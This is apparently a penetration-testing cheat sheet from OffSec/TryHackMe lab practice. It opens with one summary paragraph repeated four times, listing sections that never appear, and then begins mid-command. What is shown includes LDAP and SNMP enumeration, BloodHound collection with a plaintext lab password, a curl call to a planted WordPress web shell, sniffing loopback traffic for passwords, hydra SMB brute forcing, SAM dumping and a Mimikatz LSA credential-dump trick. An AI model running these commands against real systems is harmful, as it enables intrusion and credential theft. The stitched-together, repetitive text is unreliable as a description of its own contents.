The document provides syntax and commands for various penetration testing techniques including remote code execution through SQL injection, file transfer methods, Metasploit payload generation, Pass-the-Hash attacks, CrackMapExec commands, Potato exploits, LDAP queries, SNMP scanning, BloodHound usage, Windows service enumeration, and quick tips. Important notes are included about local file inclusion, using Mimikatz with elevated privileges, and a Powershell command for Mimikatz credential dumping.
The document provides syntax and commands for various penetration testing techniques including remote code execution through SQL injection, file transfer methods, Metasploit payload generation, Pass-the-Hash attacks, CrackMapExec commands, Potato exploits, LDAP queries, SNMP scanning, BloodHound usage, Windows service enumeration, and quick tips. Important notes are included about local file inclusion, using Mimikatz with elevated privileges, and a Powershell command for Mimikatz credential dumping.
The document provides syntax and commands for various penetration testing techniques including remote code execution through SQL injection, file transfer methods, Metasploit payload generation, Pass-the-Hash attacks, CrackMapExec commands, Potato exploits, LDAP queries, SNMP scanning, BloodHound usage, Windows service enumeration, and quick tips. Important notes are included about local file inclusion, using Mimikatz with elevated privileges, and a Powershell command for Mimikatz credential dumping.
The document provides syntax and commands for various penetration testing techniques including remote code execution through SQL injection, file transfer methods, Metasploit payload generation, Pass-the-Hash attacks, CrackMapExec commands, Potato exploits, LDAP queries, SNMP scanning, BloodHound usage, Windows service enumeration, and quick tips. Important notes are included about local file inclusion, using Mimikatz with elevated privileges, and a Powershell command for Mimikatz credential dumping.
"DC=hutch,DC=offsec" | grep sAMAccountName - To dump more details : ldapsearch -x -H ldap://192.168.240.122 -s sub -b 'DC=hutch,DC=offsec' - To dump other details : ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.240.122" Note : save ip to /etc/hosts ,first DC is machine name second one is extention like .local or .THM
snmp : Regular scan : this shit.... took me a while to find this.. It will give you hidden details ,if there is snmpwalk -v2c -c public 192.168.206.156 NET-SNMP-EXTEND-MIB::nsExtendObjects it works with -v1 as well
bloodhound: Remotely: /opt/BloodHound.py/bloodhound.py -d heist.offsec -u enox -p california -c all -ns 192.168.152.165 (no zip is created ,just upload the json files) Locally : ./SharpHound.exe --CollectionMethod All,GPOLocalGroup,LoggedOn
Services : Getting all Running services Get-Service | Where-Object -Property Status -EQ Running OR Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} Quick Tips : -(Alternative to tree command) find . | sed -e "s/[^-][^\/]*\// |/g" -e "s/|\ ([^ ]\)/|-\1/" -Getting current system architecture : dpkg --print-architecture -If you pwned a wordpress site and you uploaded your shell into 404.php here's the curl : curl http://$ip/wp-content/themes/twentyseventeen/404.php -If you see tcpdump is installed check the result of tcpdump via live scan. It might include a password : sudo tcpdump -i lo -A | grep "pass" -(bruteforcing smb via hydra) hydra -l [user] -P [wordlist] smb://[target]/[user] (UNTESTED) -Use /home/kali/THM/PrivESc/Windows/creddump7/pwdump.py against SAM and SYSTEM in case secretsdump doesn't work.
Important Notes :
- If you have LFI ,you can execute php files via directory traversal. - THIS ONE CAN SAVE YOUR 1 TIME MSF RIGHT : IF YOU'RE RUNNING MIMIKATZ WITH ADMIN BUT STILL IT'S ERRORS OUT (example kuhl) USE : `lsadump::lsa /inject` after privilege::debug , token::elevate. IT WORKS LIKE MAGIC
